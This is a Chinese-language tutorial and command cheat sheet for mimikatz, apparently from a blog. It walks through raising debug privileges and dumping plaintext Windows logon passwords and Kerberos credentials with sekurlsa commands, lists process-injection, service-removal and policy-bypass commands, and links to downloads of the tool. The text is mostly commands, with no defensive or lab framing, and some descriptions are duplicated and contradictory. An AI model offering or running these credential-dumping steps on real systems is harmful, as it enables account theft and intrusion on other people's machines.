首先介绍常用功能,再上mimikatz命令大全
文件在结尾
一、获取windows密码
1、首先打开mimikatz2.1,该版本分为32位和64位,用户可根据自己计算机的操作系统进行相应选择,若不知道自己的操作系统位数,请鼠标右键点击“计算机”-“属性”,在系统类型中即可知晓。
2、打开之后先输入privilege::debug //提升权限。
2、输入sekurlsa::logonpasswords //抓取密码。
3、再次输入sekurlsa::wdigest获取kerberos用户信息及Windows密码
二、作为轻量级调试器
可以提升进程权限 注入进程 读取进程内存等等
下面展示一个 读取扫雷游戏的内存的例子
我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了
命令大全: 一、常规的操作使用命令1、mimikatz # cls -->清屏,类似dos命令cls 2、mimikatz # exit
-->退出mimikatz 3、mimikatz #version -->查看当前的mimikatz的版本 二、系统方面的操作使用命令:system 1、mimikatz #system::user -->查看当前登录的系统用户
2、mimikazt #system::computer -->返回当前的计算机名称 三、在服务器终端的操作命令: ts
1、mimikatz #ts::sessions -->显示当前的会话 2、mimikatz #ts::processes
windows-d.vm.nirvana.local -->显示服务器的进程和对应的pid情况等
四、系统服务相关的操作使用命令:service 五、系统进程相关操作的使用命令:process 六、系统线程相关操作使用命令:thread
七、系统句柄相关操作使用命令:handle 八、加密相关操作使用命令:crypto 九、注入操作使用命令:inject 十、其他基础命令
1、cls清屏 2、exit退出 3、version查看mimikatz的版本 4、help查看帮助信息
5、system::user查看当前登录的系统用户 6、system::computer查看计算机名称
7、process::list列出进程 8、process::suspend进程名称-暂停进程
9、process::stop进程名称-结束进程 10、process::modules列出系统的核心模块及所在位置
11、service::list列出系统的服务 12、service::remove移除系统的服务 13、service::start
stop服务名称-启动或停止服务 14、privilege::list列出权限列表
15、privilege::enable激活一个或多个权限 16、privilege::debug提升权限
17、nogpo::cmd打开系统的cmd.exe 18、nogpo::regedit打开系统的注册表
19、nogpo::taskmgr打开任务管理器 20、ts::sessions显示当前的会话
21、ts::processes显示进程和对应的pid情况等 22、sekurlsa::wdigest获取本地用户信息及密码
23、sekurlsa::wdigest获取kerberos用户信息及密码 24、sekurlsa::tspkg获取tspkg用户信息及密码
25、sekurlsa::logonPasswords获登陆用户信息及密码
mimikatz开源文件(国内镜像):
https://gitee.com/mirrors/Mimikatz
mimikatz2.1:
https://wpbkj.jingzhidh.com/download/mimikatz_trunk.rar